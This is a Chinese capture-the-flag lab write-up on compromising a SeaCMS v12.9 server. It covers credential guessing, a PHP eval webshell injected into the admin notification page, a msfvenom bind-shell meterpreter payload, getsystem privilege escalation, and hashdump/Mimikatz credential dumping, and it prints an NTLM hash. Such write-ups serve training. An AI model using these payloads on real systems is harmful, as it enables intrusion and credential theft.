考点:seacms rce ,msfvemon 木马,getsystem 权限提升,hashdump/load kiwi+creds_all

# seacms

首先得知是 seacms,但不知道什么版本

# seacms 版本

访问 /data/admin/ver.txt 目录,得到 seacms 版本 v12.9

直接网上搜索版本历史漏洞
参考:https://blog.csdn.net/holyxp/article/details/140734295

直接尝试找后台路径

/cslab/

接着猜出账号密码 cslab:cslab

# seacms rce

在会员消息通知界面可以插入木马命令执行

参考上面博客,在第一行插入一下语句,点击保存即可

1";@eval($_POST[cmd]);;//

系统为 windows

# 蚁剑

注意蚁剑木马连接路径为

http://10.0.0.68/data/admin/notify.php

别用以下路径连接,连不上,但是可以命令执行

http://10.0.0.68/cslab/admin_notify.php

# flag01

flag01 在 C 盘根目录下

# msf 正向连接

之所以要正向连接,本人是 windows 系统,要用虚拟机,如果是 mac 就不用正向连接了

先用命令生成一个正向连接木马

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe 

用蚁剑上传到目标,运行

再开启正向连接

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set rhost 10.0.0.68

set lport 4444

run

# 提权

直接用 getsystem 提权

getsystem

# flag02

直接 hashdump,得到 ntlm cad8ef0c410c9709cea512052756ce5a

或者用 load kiwi 命令载入 Mimikatz
最后用 creds_all 获取全部信息

注意 flag 格式哦!